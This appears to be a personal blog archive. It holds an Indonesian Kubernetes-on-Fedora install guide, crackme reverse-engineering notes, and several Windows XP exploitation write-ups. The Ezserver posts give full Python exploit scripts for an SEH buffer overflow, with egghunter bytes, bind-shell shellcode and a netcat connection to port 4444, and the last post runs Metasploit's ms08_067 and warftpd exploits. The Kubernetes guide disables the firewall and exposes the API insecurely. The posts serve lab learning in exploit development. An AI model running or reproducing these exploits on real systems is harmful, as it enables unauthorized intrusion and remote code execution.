SCX020C06A

Tutorial Install Kubernetes di Windows


Tutorial Kubernetes untuk Windows
kubernetes_logo.png
Pada tutorial dokumentasi dari situs kubernetes disampaikan jika ingin mencoba kubernetes harus menggunakan sistem operasi Linux atau Mac OS, maka kita akan mencoba menginstall Linux Fedora di Virtual-Box manual dan tanpa menggunakan Vagrant untuk windows.

Pengaturan VM

  1. Download Virtual-Box
Instalasi seperti biasa.
2. Download & Install Fedora OS Image di Vitual-Box
Buat dua Virtual machine dengan nama “fed-master” dan “fed-node”.
Ikutin tutorial ini untuk install fedora >> http://linuxpitstop.com/install-fedora-22-workstation-on-virtualbox/ 
Tapi pada saat disuruh download image nya download yang versi server-21 disini >>
Kalau disuruh kasih password root = root.
Setelah install matikan saja VMnya kemudian masuk ke setting, ke bagian network tambah adapter baru Host-Only.
Jangan lupa disknya dihilangkan centangnya sebelum menyalakan VM.

Instalasi & Setting Kubernetes

Setelah selesai menginstall 2 VM kita akan mengikuti dokumentasi dari http://kubernetes.io/v1.1/docs/getting-started-guides/fedora/fedora_manual_config.html
SETTING FED-MASTER & FED-NODE
Setelah sudah nyala akan diminta user login masukan root dan password juga root. Kemudian ketik kode dalam kotak dibawah. Tunggu sampai selesai download.

yum -y install kubernetes docker-io
Tambahan untuk fed-master

yum -y install etcd iptables
  • Setting ip address untuk fed-master 192.168.121.9 dan untuk fed-node 192.168.121.65. 

ip addr add 192.168.121.9/24 dev enp0s8
ip link set enp0s8 up
  • Simpan ip ke file /etc/hosts

echo "192.168.121.9  fed-master
192.168.121.65 fed-node" >> /etc/hosts
  • Mengedit file /etc/kubernetes/config
Sekarang untuk mengedit file tersebut kita akan menggunakan aplikasi nano. Sekarang buka file diatas :

nano /etc/kubernetes/config
Setelah terbuka cari bagian “KUBE_MASTER” dan ubah dari http://127.0.0.1:8080 menjadi http://fed-master:8080.
Setelah di edit pencet “Ctrl+x” dan tekan “y” dan enter untuk menyimpan file.
Edit file ini di VM master dan node.
  • Mematikan firewall
Ketik perintah dibawah untuk mematikan firewall agar tidak mengganggu koneksi kubernetes.

systemctl disable iptables-services firewalldsystemctl stop iptables-services firewalld

SETTING UNTTUK FED-MASTER

Setting-setting dibawah ini dilakukan pada VM fed-master.
  • Edit /etc/kubernetes/apiserver
Edit dengan nano seperti contoh cara diatas. Ubah line seperti dibawah ini.

# The address on the local server to listen to.
KUBE_API_ADDRESS="--insecure-bind-address=0.0.0.0"
  • Edit /etc/etcd/etcd.conf
Sama caranya seperti diatas, ubah yang ada localhost menjadi 0.0.0.0

ETCD_LISTEN_CLIENT_URLS="http://0.0.0.0:2379"
  • Buat folder /var/run/kubernetes

mkdir /var/run/kuberneteschown kube:kube /var/run/kuberneteschmod 750 /var/run/kubernetes
Kalau ada error berkas telah ada, maka lewati langkah ini.
  • Jalankan service kubernetes

for SERVICES in etcd kube-apiserver kube-controller-manager kube-scheduler; do
   systemctl restart
$SERVICES
   systemctl
enable $SERVICES
   systemctl status
$SERVICES
done
Jika telah benar mengetik akan ada tampilan active (running) berarti sudah sukses.
  • Tambah node ke fed-master
Kita akan membuat file node.json yang berisi informasi mengenai node yang akan digunakan oleh kubernetes.
Jalankan perintah ‘nano ~/node.json’. Kemudian ketikan isi file seperti berikut :

{
   
"apiVersion": "v1",
   
"kind": "Node",
   
"metadata": {
       
"name": "fed-node",
       
"labels":{ "name": "fed-node-label"}
   },
   
"spec": {
       
"externalID": "fed-node"
   }
}
  • Buat objek nodenya

kubectl create -f ~/node.json

SETTING UNTUK FED-NODE

Setting-setting dibawah ini dilakukan pada VM fed-node.
  • Edit /etc/kubernetes/kubelet

###
# Kubernetes kubelet (node) config
# The address for the info server to serve on (set to 0.0.0.0 or "" for all interfaces)
KUBELET_ADDRESS="--address=0.0.0.0"
# You may leave this blank to use the actual hostname
KUBELET_HOSTNAME="--hostname-override=fed-node"
# location of the api-server
KUBELET_API_SERVER="--api-servers=http://fed-master:8080"
  • Jalankan service pada fed-node

for SERVICES in kube-proxy kubelet docker; do
   systemctl restart
$SERVICES
   systemctl
enable $SERVICES
   systemctl status
$SERVICES done
Jika sukses akan active ketiga service tersebut.

Terakhir test status node dari fed-master

kubectl get nodes
Kalau status sudah ‘Ready’ artinya sudah sukses konek dari master ke node.

Menjalankan Image Docker di cluster.

  1. Generate key

openssl genrsa -out /tmp/serviceaccount.key 2048
2. Edit file /etc/kubernetes/apiserver dan ubah :

KUBE_API_ARGS="--service_account_key_file=/tmp/serviceaccount.key"
3. Edit file /etc/kubernetes/controller-manager dan ubah:

KUBE_CONTROLLER_MANAGER_ARGS="--service_account_private_key_file=/tmp/serviceaccount.key"
4. Restart service

systemctl restart kube-controller-manager.service

Run Image.


kubectl run nginx --image=nginx --replicas=2 --port=9000
--Selesai--

Learning RE with HAWKE

In this post i will tell a simple reverse engineering with app called HAWKE.
Which you can download from here.


  1. Sandwich.app


    This simple objective-c application ask for simple serial code. After diassembly i found the validate class. The pseudocode for this class is below :
    The important part is :
    LOBYTE(eax) = 0x19c5 - (SAR(sum, 0x2)) == index3 ? 0x1 : 0x0;
    SAR is shift aritmetic right. It means the index3 must be equal to sum after shift right. Which i can write simple python code for it.


  1. Unicorn.app

  1. Fox.app

  1. Socks.app


Software Exploitation : Ezserver Using Egghunter

Exploit : Ezserver using Egghunter

Last post I have told you the way to exploit ezserver to open calculator app. It was a great POC. But there is a problem, because we can't send our payload to esp register. The register is to small for our shellcode but the buffer is huge space. The technique now is to use egghunter. Egghunter is a piece of code that basically search for our shellcode anywhere in the memory. It searches for the “keyword” then execute code after the keyword is found.
In this post I will use egghunter code from skape and from this website.

So here is our plan for fuzzer

[+] How its work

- The previously our buffer with "A"s, now we will fill it with our shellcode and adjust it to keep it fit with eip offset.
5884 - 100 - 352 = 5432 bytes

- Our shellcode append with "w00tw00t"
8 + 344 = 352 bytes

- Egghunter code




[+] Try the hunter

- Next is try to see if the egghunter code is working by using \xCC to stop the execution of our application in debugger.

- Open ollydebugger, attach it to ezserver application.
- Run script below with our \xcc and adjusted alignment.

awalan="\x90" * (5784 - 12)  
cece=("w00tw00t" +"\xcc\xcc\xcc\xcc") 
buffer = "\x90" * 100  
offset="\xeb\x06\x90\x90"
popret="\x96\x96\x20\x10" 
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
+"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
akhiran="\x90" * (250 - len(egghunt)) 

LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((LHOST,LPORT))
sock.send( awalan+ cece + buffer + offset + popret + nopsled + egghunt + akhiran )
print ("[+] Buffer send success..\n")
sock.close()


- Pass the exeption in olly and wait few seconds then it hit our cc. 



- By this means our egghunter code is running and it successfully find our code in this case four "\xCC".

[+] Connecting

- By far our code is running okey, now we will use windows bind shell as our payload, in port 4444.
- Here is my final code.

#!/usr/bin/python
import socket, sys, os
from time import sleep

print "\n ================================= "
print " >      EZServer SEH Overflow    <"
print " >         Written by aldo       <" 
print " >           i-s-2-c             <"
print " =================================\n"

awalan="\x90" * (5784 - 352) #len(payload)
payload=("w00tw00t" +
"\xdb\xd3\xba\xd2\x1b\x8d\xdf\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5f"
"\x31\x57\x17\x03\x57\x17\x83\x3d\xe7\x6f\x2a\x3d\x72\x9b\x98\x55"
"\x7a\xa4\xdc\x5a\x1d\xd0\x4f\x80\xfa\x6d\xca\xf4\x89\x0e\xd0\x7c"
"\x8f\x01\x51\x33\x97\x56\x39\xeb\xa6\x83\x8f\x60\x9c\xd8\x11\x98"
"\xec\x1e\x88\xc8\x8b\x5f\xdf\x17\x55\x95\x2d\x16\x97\xc1\xda\x23"
"\x43\x32\x0b\x26\x8e\xb1\x14\xec\x51\x2d\xcc\x67\x5d\xfa\x9a\x28"
"\x42\xfd\x77\xd5\x56\x76\x0e\xb5\x82\x94\x70\x86\xfa\x7f\x16\x83"
"\xbe\x4f\x5c\xd3\x4c\x3b\x12\xcf\xe1\xb0\x93\xe7\xa7\xae\x9d\xb9"
"\x59\xc3\xf2\xba\xb0\x7d\xa0\x22\x55\xb1\x74\xc2\xd2\xc6\x4a\x4d"
"\x49\xd6\x7b\x19\xba\xc5\x80\xe2\x6c\xe9\xaf\x4b\x04\xf0\x36\xf2"
"\xfb\xf3\xb4\xa1\x69\x06\x46\x99\x06\xdf\xb1\xec\x7a\x88\x3e\xd8"
"\xd6\x64\x92\xb7\x8b\xc9\x47\x74\x7f\x31\xb7\x1c\x17\xdc\x64\x86"
"\xb4\x57\x75\xd3\x53\xcc\x6c\xab\x64\x5b\x6e\x9d\x01\x74\xc1\x74"
"\x29\xa4\x89\xd2\x78\x6b\xa3\x4d\x7c\xa2\x60\x24\x7d\x9b\xef\x23"
"\xc8\x9a\xb9\xfc\x34\x74\x69\x56\x9f\x2c\x75\x86\x8c\xa7\x6e\x5f"
"\x75\x4e\x26\x60\xaf\xe4\x37\x4e\x36\x6d\xac\x08\xdf\x12\x41\x5d"
"\xfa\xbf\xc9\x04\x2c\x8c\x63\x51\x44\x48\xfd\x7f\xa8\x90\x0e\xd5"
"\x35\x52\xdc\xd7\x88\x7f\x8d\xaa\x77\xb8\x1a\x1f\x2c\xd0\x2e\xa1"
"\x80\x37\x30\x28\xa3\xc8\x18\x89\x7c\x65\xf4\x7c\xd2\xe3\xf7\x2f"
"\x85\xa6\xa6\x30\xf5\x21\xe4\x17\xf3\x7f\xa5\x58\x2a\x15\xb5\x59"
"\xe4\x15\x99\x2e\x5c\x16\x99\xf4\x07\x19\x48\xa6\x38\x35\x1d\x38"
"\x1f\x54\xad\x97\x60\x4f\xad\xc7")  # size 344 + 8 = 352 
buffer = "\x90" * 100     #align the stack (kurang awalan 5884 | 100)
offset="\xeb\x06\x90\x90"  #jmp 6 byte
popret="\x96\x96\x20\x10"  #posisi seh -> eip
nopsled="\x90" * 2
egghunt=("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
+"\x77\x30\x30\x74"+"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") #32 byte egghunter
akhiran="\x90" * (250 - len(egghunt)) 

LHOST="192.168.56.101"
LPORT=8000
print "\n[+] Connecting to %s on port %d\n" % (LHOST,LPORT)
try:
 sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 sock.connect((LHOST,LPORT))
 sock.send(awalan+ payload + buffer + offset + popret + nopsled + egghunt + akhiran )
 print ("[+] Buffer send success..\n")
 sock.close()
 print "[+] Wait for hatch (0)..\n"
 sleep(5)
 print "[+] Connecting...\n"
 sleep(9)
 os.system("nc -n %s 4444" %LHOST)
except:
 print "[-] Could not connect to %s on port %d\n" % (LHOST,LPORT)
 sys.exit(0) 



- Run Ezserver application.


- The running script.


- Win.

Software Exploitation : Ezserver

Today we will going to exploit an application name Ezserver. Ezhometech Eserver is a simple http server, that serve a requested web page from client.
We will using Windows XP SP3 English in VirtualBox.


[*] Information gathering

 - The app is using port 8000 and here when using nmap :
8000/tcp open  http-alt
- Web using html with heavy javascript.

 [*] Fuzzing

- Create simple fuzzer for request to ezserver.

- Send "A" buffer, first try for 1000 but the ezserver is still up, second try times ten to 10.000 A's and ezserver is crash. Oke next step.

[*] Debug

- Now we eill try to find out what happened to ezserver when it crash. In this step i will use Immunity debugger. First open Immunity and attach to ezserver.
-Don't forget to run it, next we will try to send our fuzzer again.


- The register ESP ESI EDI is filled with our A's. The immunity is requesting to pass the exeption to the application.



- And our EIP an SEH Chain is also hit by "\x41".
- Now that we know we can hit EIP we can try to find EIP offset using pattern with pattern_create 10000 and send it using our fuzzer.




- Now the value is 336f4832 and using pattern_offset and we find our offset "5888".
- Next we will confirm it with deadbeef.


- The SEH chain is now DEADBEEF. Next is try to bypass SEH using command POP POP RETN.

- We search in ezserver own dll, MSVCRTD.dll and the address is 10209696 = "\x96\x96\x20\x10"

- We just toogle the breakpoint to see if the address is pointed.




After we toogle the breakpoint now we will try to run the fuzzer.




The eip is sucessfully go to our intended addres for POP POP RETN, now we can bypass SEH.

[*] Exploit






- Here are just the diagram I draw to how how we will try to open “Calculator” app.
- First is the buffer which is 5888 byte long.
- Our buffer is filled with 5884 byte “A” and our jump short code. Jump short code is \xEB\x06 and 06 is 6 byte. Because i use 32bit register so we add 2 nops = \x90\x90.
- Next our payload, and we use metasploit payload foe executing command.




- Here is the payload for calc.exe.

- And here are our last fuzzer. Lets run it.

- And looks like we done it.

- next post we will try to send our shellcode and using egghunter!

Try to exploit smb and warftp in Win XP

Today task is to exploit smb service and war-ftp in windows xp. First with smb.

Nmap to remote host .
Port 21/tcp   open  ftp          WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
And Samba service is turn on.
Now using metasploit framework. Search for smb. 
Using ms07_029_msdns_zonemane which doesn't work with Windows XP apparently.
Switch to use ms08_067_netapi, set the remote ip, and exploit.
And we are in.
 


Next is warftp,
First is search metasploit and found 2 match, warftpd_165_user and warftpd_165_pass.


Then use warftpd_165_pass and set the remote host ip,
Exploit but no luck, swich to warftpd_165_user.
Exploit and error occur "Exploit failed: A target has not been selected."
A quick googling and the answer is to set the target.


 Set the target to 3, Windows XP SP3


Run the exploit, but it send me a "connection was refused error" , then i check the virtual box, the warftp is crash from the previous attempt, so rerun and start the ftp daemon.
Rexploit and done we are in again.
Thank you for reading.